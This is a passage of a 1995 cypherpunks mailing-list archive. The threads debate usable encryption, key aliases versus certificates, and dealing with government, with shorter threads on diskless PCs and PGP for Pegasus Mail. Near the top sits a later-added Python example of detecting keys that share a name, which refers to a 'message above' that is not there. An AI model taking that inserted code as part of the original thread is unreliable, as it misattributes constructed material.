 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com
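
An added illustration of the check described in the message above, not code from the thread or from any mail client: a small SQLite key store that detects when two keys carry the same creator-chosen name and qualifies the displayed name with what it knows about each key. The `signed_by` field (assumed to hold an already verified signature from another stored key), the function names and the sample keys are assumptions made for this example.

```python
import sqlite3
import unicodedata

# Constructed sample records: (fingerprint, creator-chosen name, first seen, signed_by).
# signed_by is the fingerprint of a stored key whose signature on this key was
# verified at import time (assumption), or None.
SAMPLE_KEYS = [
    ("A1B2C3D4E5F60718", "Alice Example", "1995-03-01", None),
    ("99887766554433AA", "Alice Example", "1995-11-20", "A1B2C3D4E5F60718"),
    ("0F0E0D0C0B0A0908", "alice  EXAMPLE", "1995-11-25", None),
    ("1234567890ABCDEF", "Bob Example", "1995-06-10", None),
]


def name_key(name):
    """Fold case, spacing and Unicode compatibility forms before comparing names."""
    return " ".join(unicodedata.normalize("NFKC", name).split()).casefold()


def open_store(rows=SAMPLE_KEYS):
    """Build an in-memory key database indexed by the normalized name."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE keys (fingerprint TEXT PRIMARY KEY, name TEXT NOT NULL,"
        " name_key TEXT NOT NULL, first_seen TEXT NOT NULL, signed_by TEXT)"
    )
    db.execute("CREATE INDEX keys_by_name ON keys(name_key)")
    db.executemany(
        "INSERT INTO keys VALUES (?, ?, ?, ?, ?)",
        [(fp, name, name_key(name), seen, signer) for fp, name, seen, signer in rows],
    )
    return db


def classify(db, fingerprint):
    """Return (status, related_fingerprint) for a key among keys sharing its name.

    unique    - no other key uses this name
    original  - the earliest key seen under this name
    successor - signed by an earlier key with the same name (key change)
    unlinked  - same name, no link to an earlier key (collision or spoof)
    """
    row = db.execute(
        "SELECT name_key, first_seen, signed_by FROM keys WHERE fingerprint = ?",
        (fingerprint,),
    ).fetchone()
    if row is None:
        raise KeyError(fingerprint)
    nkey, first_seen, signed_by = row
    earliest = db.execute(
        "SELECT fingerprint, first_seen FROM keys"
        " WHERE name_key = ? AND fingerprint <> ?"
        " ORDER BY first_seen, fingerprint LIMIT 1",
        (nkey, fingerprint),
    ).fetchone()
    if earliest is None:
        return ("unique", None)
    if first_seen < earliest[1]:  # ISO dates compare correctly as strings
        return ("original", None)
    linked = db.execute(
        "SELECT 1 FROM keys WHERE fingerprint = ? AND name_key = ? AND first_seen < ?",
        (signed_by, nkey, first_seen),
    ).fetchone()
    if linked:
        return ("successor", signed_by)
    return ("unlinked", earliest[0])


def display_name(db, fingerprint):
    """Show the bare name when it is unique, otherwise qualify it."""
    status, other = classify(db, fingerprint)
    name, first_seen = db.execute(
        "SELECT name, first_seen FROM keys WHERE fingerprint = ?", (fingerprint,)
    ).fetchone()
    if status == "unique":
        return name
    if status == "original":
        note = "earliest key seen under this name"
    elif status == "successor":
        note = "signed by earlier key " + other[-8:]
    else:
        note = "no signature from earlier key " + other[-8:] + "; collision or spoof"
    # The 8-character tail only tells entries apart on screen; it is not a
    # substitute for checking the full fingerprint over another channel.
    return f"{name} [{fingerprint[-8:]}, first seen {first_seen}, {note}]"


if __name__ == "__main__":
    store = open_store()
    for fp, *_ in SAMPLE_KEYS:
        print(display_name(store, fp))
```

The store cannot tell an accidental collision from a deliberate spoof on its own; it can only show that no earlier key vouches for the newcomer and leave that question to the user.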





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Wed, 29 Nov 1995 01:52:33 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: The future will be easy to use
Message-ID: <v02120d00ace0f66694dc@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 11/26/95, James A. Donald wrote:
>At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
>> it
>> means forming a group, made up of Cypherpunk members perhaps, but much
>> smaller, and capable of working together. Also capable of handling not only
>> the theory, but good solid code, GUI, PR, meetings, talking to the
>> government, etc.
>
>Skip the talking to the government bit:  Ignore, do not confront.

I can't agree. The model of a successful enterprise includes feedback from
different levels of participants. Regardless, the government will be taking
a role in encryption. Thus even if they aren't a defining part of the
development, bringing them to a limited extent into the loop, and finding
even small areas which the government would support, helps provide better
buy-in by the government officials who participate, helping the momentum.

The point isn't to bring them into the design, but simply to use their
feedback to optimize our PR approach.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Wed, 29 Nov 1995 00:13:40 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <199511281653.KAA23530@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> To:            stevenw@best.com (Steven Weller)
> Cc:            cypherpunks@toad.com
> Subject:       Re: The future will be easy to use (fwd) 
> Reply-to:      perry@piermont.com
> Date:          Tue, 28 Nov 1995 08:29:10 -0500
> From:          "Perry E. Metzger" <perry@piermont.com>

> 
> Steven Weller writes:
> > >Realistically, who in their right mind would buy a diskless workstation to
> > >connect to Internet?
> > 
> > The same sort of things could be said of the telephone compared with
> > written correspondence. Why would anyone have one in their business or
> > home? Anyone can overhear a conversation, people will just chat, the only
> > thing you can do with it is talk, there is no record of the correspondence,
> > why would anyone want to talk to people on the other side of town? etc.
> 
> This is different. In an era of distributed processing, they are
> returning you to the mainframe model. I don't see that this can work
> very well. Considering how much more powerful a $1000 machine is, why
> would you want something half that price that can do one hundredth as
> much for you?

I beg to differ.  Even though Larry Ellison's idea is silly, I don't 
see it as returning us to the mainframe model.  Rather, I see it as 
just a small step backwards.  Right now, I've got a 486/DX2-66 with a 
paltry 50 MB HD on my desk at work.  Most of its processing is done 
loading stuff off the LAN and running it locally.  The fact that I 
have a local disk makes not the slightest bit of difference except at 
boot-time.

If the diskless workstation were to have *no* intelligence 
whatsoever, I'd agree with you.

As to diskless workstations being of no value, again, I'd have to 
disagree.  Diskless workstations, especially X terminals that have a 
little NVRAM in them, have been rather popular for several years as a 
way to get graphical objects onto people's desks without having to 
shell out a ton of money in the process.  The only reason that 
they're getting less popular is that PC prices have fallen 
dramatically for the past several years, so much so that it's 
cost-effective to put a DX2-66 with 8 MB of RAM and a little disk (or 
no disk at all) on someone's desktop as opposed to something from 
Network General.

Me, I'm waiting for the day that someone gets clever and puts Linux 
into ROM. :)  Java is starting to get really hot, so much so that I 
was telling my spouse that if she wanted to learn Java, she'd have 
steady contracts in the next year or so, even in the sticks of Dallas 
;)  The point is, the market for a cheap, fast PC that will run 
applets *is* there, or will be soon.

I only hope that they make it upgradeable, so *I* can put that 5 GB 
array on it, and beef up the memory without having to take a second 
mortgage to do it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Wed, 29 Nov 1995 00:20:02 +0800
To: cypherpunks@toad.com
Subject: PGP hooks for Pegasus Mail?
Message-ID: <199511281657.KAA23689@khijol>
MIME-Version: 1.0
Content-Type: text/plain


Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
running it at home now (SLIPped into my Linux box), and I'd like to 
find a way to integrate PGP into Pegasus Mail.

Thanks in advance for any replies...

-- Ed Carp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Wed, 29 Nov 1995 02:41:26 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use
Message-ID: <v02120d02ace0fcab0df8@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:26 AM 11/28/95, Perry E. Metzger wrote:
>Jonathan Zamick writes:
>> I can't agree. The model of a successful enterprise includes feedback from
>> different levels of participants.
>
>This isn't an enterprise. The government is not a participant except
>by their own desire to interfere.
>
>> Regardless, the government will be taking a role in encryption.
>
>What makes you say that? Besides, why would that be desirable on any
>level?
>
>The Government will try to set standards and we will ignore them until
>they try to force them on us by law, period.

This discussion was based on a group of people getting together to create
a new easy to use package for handling keys and such. The government is
going to try to take a dominant stance, and mandate elements of it. That
has to be assumed. Those elements we don't agree with will be ignored or
worked around (depending if it's government opinion or government law.)
However, it is possible, even in an antagonistic relationship, to develop
positive feedback. I may be cracked, but I'd like to think that it would
be an advantage to find some area where the government and the Cypherpunk
members do agree, to minimize the conflict over the areas where we don't.

Still, this is getting past the original topic, and gets more into the
religious level of whether there can be any cooperation when the two
sides are Government and Good/Widespread Encryption. My stance is that
currently, no, but that doesn't preclude it in the future. Others don't
see it happening at all, or don't see it worth the investment to achieve.
That is perfectly valid.

---

Returning to the original topic though, do we want to get a smaller list
together to spec out some ideas for the project that was discussed? A
simple, transparent, tool which would allow people to use strong encryption
without having to think about it?

I don't have much time to contribute right now, but I can at least put
together the list, and some ideas.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 29 Nov 1995 00:11:06 +0800
To: ylo@cs.hut.fi
Subject: Re: Intelligence Community Massive Digital Data Systems Initiative
In-Reply-To: <199511272333.PAA12647@comsec.com>
Message-ID: <9511281542.AA09773@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the real capacity measure is the number of satellite surveillance
images per day -- at their high resolution.  Anyone know that resolution?

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Thu, 30 Nov 1995 02:15:27 +0800
To: "(Bill)" <cypherpunks@toad.com
Subject: Re: Who has the right to read your e-mail? Old hash, but I need to  ask.
Message-ID: <199511281601.LAA02857@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:58 AM 11/28/95 -0600, (Bill) wrote:
>Who has the right to read your personal e-mail.
>E-mail created at work?
>E-mail downloaded at work?
>E-mail stored on a PC at work? 

The December 1995 issue of Communications of the ACM (CACM) has several
articles on e-mail privacy.

Managing User Perceptions of Email Privacy
Suzanne P. Weisband and Bruce A. Reinig

The Ethical and Legal Quandary of Email Privacy
Janice C. Sipior and Burke T. Ward


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 29 Nov 1995 00:50:29 +0800
To: cypherpunks@toad.com
Subject: NAV_dat
Message-ID: <199511281635.LAA13666@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Zero Kelvin crypto but The NYPaper hisses 28 Nov:

      The US Navy is starting to release a treasure trove of
      physical data about the sea that was gathered in secrecy
      during the long decades of the cold war, exciting
      scientists who see it as a bonanza for understanding
      environmental change. Over the decades, the Navy
      deployed thousands of ships, airplanes, submarines and
      satellites to collect such data. Usually kept secret,
      the archival readings are seen as unrivaled yardsticks
      for judging long-term processes of global climatic
      change and planetary warming. A geophysicist said the
      value of that data for scientific and commercial 
      exploitation is measured in billions of dollars.

   "Scientific Utility of Naval Environmental Data," a June,
   1995, 52-page appraisal by the Medea scientific advisory
   group, is available for free by telephoning (703) 883-5265
   voice or (703) 883-6190 fax.

   NAV_dat  (13 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 29 Nov 1995 03:51:22 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE, sorta] Re: Inexpensive Crypto Boxes...
Message-ID: <199511281935.LAA06806@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 AM 11/28/95 -0500, Mike Fletcher <fletch@ain.bls.com> wrote:
>	For those who don't know, the PSX is a CD based gaming console
>released (in the US) in Sept by Sony.  It's a MIPS R3000/25MHz processor
>with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM.

There are a number of reasonably powerful game machines under $300,
though that uses TV-screen video, which isn't enough for decent text;
doing a $500 machine with a real monitor should be quite possible.
However, to make it functionally useful, it needs at least a connector
for a disk drive - couch potato web-surfers can skip it, but anybody
who wants to do real work will spend the $100-300 to add a disk,
and probably add a CD-ROM as well.  Without a disk, you can't do
off-line reading, which significantly affects anyone using
pay-by-the-hour network access services.

(I used to use a diskless Sun with 40 MB RAM on an Ethernet, and it
was usually fine, but I was motivated by not wanting a fan on my computer...)

ObCrypto - you _can_ do decent crypto on a diskless machine as long as
you've got some non-volatile storage for keys; a few KB should do,
and the main applications would have to run in ROM.


>	The line between toy and real machine is getting more and 
>more fuzzy (we use a box here at work with the same processor to compile
>for an AT&T telephony switch (which tells you how sad the AT&T product
>is :) :))).  

Telephone switches don't need high-power CPU-crunchers, and the 
R3000 was quite a decent processor.  They need clean, stable CPUs
and appropriately-designed operating systems which are good at
controlling lots of polled I/O devices - it's a PDP-11 job,
rather than a Cray job.  Generally the OSs have been
hand-rolled, though it's becoming much more practical to use
Unix to develop user-interface applications now that processors
are fast enough to have short interrupt times.  The previous 
switches used Intel processors - 386s let you do more than 8086s,
pulling applications into the CPU instead of low-level logic.

>How long until the NSA tries a Chinese Lottery attack hidden
>inside a Nintendo cart?

You've read "The Hacker and the Ants", haven't you?  :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Wed, 29 Nov 1995 04:03:41 +0800
To: Carl Ellison <cme@TIS.COM>
Subject: Re: The future will be easy to use
In-Reply-To: <9511281803.AA20521@tis.com>
Message-ID: <Pine.SUN.3.91.951128113331.17420A@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 28 Nov 1995, Carl Ellison wrote:
> Raph Levien wrote:
> >   First, on what basis will users decide which keys are worthy of being
> >assigned which aliases?  Public keys are big hunks of base64 encoded
> >gibberish.  They are difficult to present in a user interface, difficult 
> >to communicate in alternate, known secure channels (such as telephone 
> >calls and face to face communication).  There is no way that a person 
> >could memorize one.
> 
> That's true.  What the user would have to see is some icon (or, for
> text-bound folks, a temporary unique string) until the user chooses and
> assigns the appropriate alias.  That icon would have no meaning by itself.
> It would acquire a meaning by being associated with some message or set of
> messages:
> 
> a) an attribute testimony (signed by someone with known authority to
> 	specify such an attribute -- the equivalent of a certificate)

This is the induction case, not the base case. It assumes that you've 
already got a bunch of trusted public keys in your database. It also 
assumes the willingness of the owners of those public keys to sign new 
keys. See, now they've got the same problem of trying to determine 
whether the key is valid. Turtles all the way down.

> b) a set of messages signed by the key in question (tying the key to
> 	the source material from which the user formed his/her impression
> 	of the sender)

There being no reason, of course, why Mallet couldn't just sign all that 
stuff with his own signature. Here, you're relying on the ability of data 
to authenticate itself.

I am simply proposing a third alternative that has neither of these
problems: a short unique name for the key. Its success relies on
alternate, non-digital forms of communication: the phone, ink-signed
paper, face to face, whatever. 

[complex stuff deleted - I only wanted to make a simple point]

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Wed, 29 Nov 1995 04:07:54 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.951128114347.17420B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 28 Nov 1995, E. ALLEN SMITH wrote:

> 	If you'd like a non-programmer user to test out the user interface, I'm
> available to some degree if it's usable on a VAX (and to a lesser degree for
> MS-DOS). Given the number of people like me who are interacting using a non-GUI
> interface for various reasons (including using a mainframe for email), I would
> suggest not making it specifically GUI-dependent.

Unfortunately, it's _way_ too early to recruit volunteers to test out the 
user interface. But thanks.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Wed, 29 Nov 1995 01:52:28 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <9511281715.AA23370@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 11/28/95 +0000, you wrote:
>Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
>running it at home now (SLIPped into my Linux box), and I'd like to 
>find a way to integrate PGP into Pegasus Mail.
>
>Thanks in advance for any replies...


Ed -

  I haven't heard of anything re: "PGP hooks into Pegasus Mail".  At one
time, Eudora and ViaCrypt were discussing it but, from what I heard, those
discussions fizzled out.
  The easiest way to *integrate* is to use a front end program.

Regards -
Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:11:06 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d00ace0f66694dc@[157.22.240.13]>
Message-ID: <199511281726.MAA00314@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Zamick writes:
> I can't agree. The model of a successful enterprise includes feedback from
> different levels of participants.

This isn't an enterprise. The government is not a participant except
by their own desire to interfere.

> Regardless, the government will be taking a role in encryption.

What makes you say that? Besides, why would that be desirable on any
level?

The Government will try to set standards and we will ignore them until
they try to force them on us by law, period.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 02:33:58 +0800
To: frantz@netcom.com
Subject: Re: Bitbux could eliminate some domestic currencies?
Message-ID: <01HY6DKHWT5S8WYPWJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 27-NOV-1995 02:55:15.66

Gresham's law says that the bad money drives the good money out of
circulation.  Does this mean that real cash is better than ecash ;-).
------------------
	You may realize this (due to the smiley), but what Gresham's law says
is that hard to distinguish bad money drives good money out of circulation. If
something is distinguishable, then it works the other way around (see the
replacement of the ruble by the dollar in pre-modern Russia, for instance).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 02:32:01 +0800
To: raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"raph@c2.org"  "Raph Levien" 27-NOV-1995 17:11:37.38

It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
Gutmann, and others have proved themselves quite capable of writing good
solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
Dan Bernstein, and some others (who I'm not sure want to be named) are
talking to the government. GUI I'm less sure about, but I'd hope that some
cpunks would come out of the woodwork.
------------------
	If you'd like a non-programmer user to test out the user interface, I'm
available to some degree if it's usable on a VAX (and to a lesser degree for
MS-DOS). Given the number of people like me who are interacting using a non-GUI
interface for various reasons (including using a mainframe for email), I would
suggest not making it specifically GUI-dependent.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:41:36 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
Message-ID: <199511281748.MAA00358@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"E. ALLEN SMITH" writes:
> Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> be named) are talking to the government.

If you call lawsuits "talking", not that talking is important.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 02:51:34 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use
Message-ID: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com" 28-NOV-1995 12:49:12.47

"E. ALLEN SMITH" writes:
> Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> be named) are talking to the government.

If you call lawsuits "talking", not that talking is important.
-----------------
	Umm... I wasn't the one that wrote that. It was included in the
message to which I was replying.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:52:12 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d02ace0fcab0df8@[157.22.240.13]>
Message-ID: <199511281801.NAA00386@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Zamick writes:
> This discussion was based on a group of people getting together to create
> a new easy to use package for handling keys and such. The government is
> going to try to take a dominant stance, and mandate elements of it.

So we can ignore them. Big deal. They have no laws with which to
enforce their desires.

> However, it is possible, even in an antagonistic relationship, to develop
> positive feedback.

Who cares? An hour spent talking to an idiot from Washington is better
spent writing good code unless there is a law pending in congress, in
which case you are probably better off paying someone who knows what
they are doing to do the talking for you.

> Returning to the original topic though, do we want to get a smaller list
> together to spec out some ideas for the project that was discussed? A
> simple, transparent, tool which would allow people to use strong encryption
> without having to think about it?

You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not
Photuris, although I'll be trying to port Aggelos Keromytis' version
at some point) on my laptop at the IETF meeting in Dallas (provided
that I can buy a laptop in time.)

There are three things we are currently missing in the architecture,
IMHO.

1) We need a certificate system to replace X.509 and that plays nicely
   with distributed databases.
2) We need to implement the Eastlake/Kaufman method for embedding
   certificates in the DNS or something similar.
3) We need a good entity naming model.

Given all those being implemented, sometime soon I can see people
telnetting or ftping hither and thither without ever noticing or
caring that their sessions are completely encrypted.

We also have the following need:

4) A good MIME mailer (that looks like NeXT Mail or something like it)
   which has hooks for something MOSSlike that uses the same
   certificate infrastructure described in 1-3 above.
5) SHTTP capable browsers that also use 1-3 listed above.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:52:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu>
Message-ID: <199511281802.NAA00401@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I apologize. Your inclusion style is unusual and confused me.

"E. ALLEN SMITH" writes:
> From:	IN%"perry@piermont.com" 28-NOV-1995 12:49:12.47
> 
> "E. ALLEN SMITH" writes:
> > Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> > be named) are talking to the government.
> 
> If you call lawsuits "talking", not that talking is important.
> -----------------
> 	Umm... I wasn't the one that wrote that. It was included in the
> message to which I was replying.
> 	-Allen
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 29 Nov 1995 03:00:20 +0800
To: raph@c2.org
Subject: Re: The future will be easy to use
In-Reply-To: <199511280009.QAA12863@comsec.com>
Message-ID: <9511281803.AA20521@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 11:06:13 -0800 (PST)
>From: Raph Levien <raph@c2.org>


>   From this perspective, let's take a look at the recent thread on
>"establishing trust." Carl Ellison advocates the MOSS alias system. My
>understanding of this system is that individual users associate "aliases" 
>with public keys. If done right, it can work well. However, from a
>usability perspective, it is just one more trouble spot. 

Yes, it could easily be done wrong in such a way that the user gets
confused rather than helped; burdened rather than relieved.

I advocate aliases because that's how *I* think.  I think in words so I
assign my own names (aliases) for the people who populate my mental model
of the world.  By definition, these are all my correspondents.  It's
possible of course that some other people (of different Myers-Briggs type,
perhaps) think differently -- not in words or aliases.  If that's true, we
should find out how they think and associate the right thing for them.  For
example, I had a friend (a painter/sculptor) who thought in images.  She
might prefer to use little pictures or icons (of her own drawing) as the
aliases.

>   First, on what basis will users decide which keys are worthy of being
>assigned which aliases?  Public keys are big hunks of base64 encoded
>gibberish.  They are difficult to present in a user interface, difficult 
>to communicate in alternate, known secure channels (such as telephone 
>calls and face to face communication).  There is no way that a person 
>could memorize one.

That's true.  What the user would have to see is some icon (or, for
text-bound folks, a temporary unique string) until the user chooses and
assigns the appropriate alias.  That icon would have no meaning by itself.
It would acquire a meaning by being associated with some message or set of
messages:

a) an attribute testimony (signed by someone with known authority to
	specify such an attribute -- the equivalent of a certificate)

b) a set of messages signed by the key in question (tying the key to
	the source material from which the user formed his/her impression
	of the sender)

I, the user, would want to be able to call up the set of defining messages
for any key or alias at any time in the future -- just in case I get so
many aliases that I forget who one belongs to.

>   The other issue is how much time and energy the user has to spend 
>keeping the alias database up to date. There is no way to communicate 
>securely with anyone who's not in the database. If the user is 
>communicating with a large number of people, then it's very tempting to 
>get sloppy.

I keep a fairly large database of aliases already, in my .mailrc on UNIX.
Eudora permits a similar DB.  So do a number of other mailers.  Users must
be demanding this feature and using it.  All I say we have to add to that
is protection from tampering.

>   There's no way around it. This kind of system will not make it in the 
>big time.  

I wouldn't be so quick to dismiss it.

>	    As I see it, any system that does must have the following 
>properties:
>
>   * Some variant on the Web of Trust.

Of course -- you have to have some means for communicating and recording
attributions (that the person who owns a key is allowed to spend money on a
given bank account; that the person who owns a key goes by the name Carl or
receives mail at cme@acm.org; that the person who owns a key is a trusted
developer of PGP; ...).

>   * Online key-servers for getting keys in real time.
>   * A clean mechanism for validating keys through alternate channels.

These two have to go together -- but I'm curious what anyone means by
"validating keys".  I see this as the flaw killing certificate structures
like X.509 or PGP's.  [Even Steve Kent, a major X.509 advocate, seems to
see this problem (with sadness, in his case).]

I had a secretary once, long ago.  I would drive her home from work
occasionally -- or to parties -- when her husband wasn't around or wasn't
interested in going someplace.  One time, in passing, he noted that this
arrangement was OK with him because he "trusted her".  I trusted her, too.
I knew her to be having affairs with various people (not me at the time)
but he didn't.  So we each trusted her but what we trusted her to be was
different.  Just saying that we trusted her wasn't saying anything.

As soon as you qualify the "validated key" (e.g., to be allowed to spend
money, etc.), you get to the signed attributes which I advocate over
certificates.  If all you do with the validated key is tie it to a text
string which purports to specify a human being, as X.509 or PGP do, you
haven't done anything for me.  If all humans had unique names, then this
might mean something to me (assuming I knew the human in question and knew
his unique name).  However, that's what killed X.509 -- the need for unique
names.  We don't have them and we're not about to adopt some new social
structure which assigns them.  Even if we did all adopt unique names, you
postulated a *large* set of people to communicate with -- larger than my
immediate circle of acquaintances, presumably -- so even a unique name
would be meaningless to me because I would not have met the person in
question.  If the unique name certificate works at all it's because I have
some mechanism (not mentioned in the certificate hierarchy design) for
attaching attributes to the named person.  However, if I haven't met the
person in question, I don't have that mechanism already and it needs to be
created alongside the certificate mechanism.

I don't need testimony about the name (unique or otherwise) of the person
who owns that key.  I need testimony about the attributes of that person
(PGP developer; fellow Cypherpunk; FBI agent; undercover NSA plant;
permission to use a checking account; receives mail at xxx@yyy.com; ...).
That testimony can be provided by referencing the key itself, rather than
some (artificially unique) name which exists only to link the attribute to
the key.  The S/W which links these together and lets me find the various
testimonies for a key has to be convenient -- but that was your original
point and I concur.  I object only to the implication that current
certificate hierarchy thinking gets us closer to that goal than the direct
signed attribute statements would.

>   There are three possible outcomes: we build it, the NSA builds it, or 
>Microsoft/Netscape builds it. This last outcome might not be so bad, but 
>only in the first one can we rely on our principles being advanced.

Amen!

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtON1QXJENzYr45AQGiEwP+OpETJDPJ8rWbur4oH/PCZqKWtXmzTquV
4QIwoZlXoK6RnZ60szR/qqPxjnj+TtsO8FOQK5lWurv+FG67ma5PfyNbxU+WFapY
uxwop8Ivb3bw0uFT2oh2VE5owAYFkmqz7kd7GleEG33dGOUz7jSELugzL4Ag8zRF
40qPwsU7B08=
=aeKx
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtOvVQXJENzYr45AQH5RQP+JroFSz3bJapOGEqA2pfhZ1dn9d7VDEUd
